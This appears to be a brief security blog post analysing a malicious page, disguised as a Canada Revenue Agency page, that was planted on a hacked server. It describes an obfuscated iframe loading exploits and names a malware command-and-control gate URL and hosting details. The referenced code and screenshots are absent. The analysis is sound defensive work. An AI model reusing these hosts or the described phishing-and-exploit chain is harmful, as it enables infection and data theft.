I found a malicious page placed on a hacked server:
CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:
The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:
But what is the rest of the obfuscated code?
Here is the deobfuscated version (courtesy of Wepawet):
Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:
I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):
This is a pretty cool feature that can prevent many infections. Thanks Google
Following a successful installation, the malware will call 220.127.116.11/email/gate.php at regular intervals and send data in what looks like a custom obfuscation form:
Let’s check out the malicious domain: somerandomiframedomain.com
Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.
Registrant information is bogus (of course):
Ricardo GALENO @austin.co.com
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741
Other domain names on that server include:
This ASN is deeply involved in allowing CnC servers and other bot related activities:
At this moment, I am not sure what the connection (if any) between the malware and the Canadian Revenue Agency is.
Leave a reply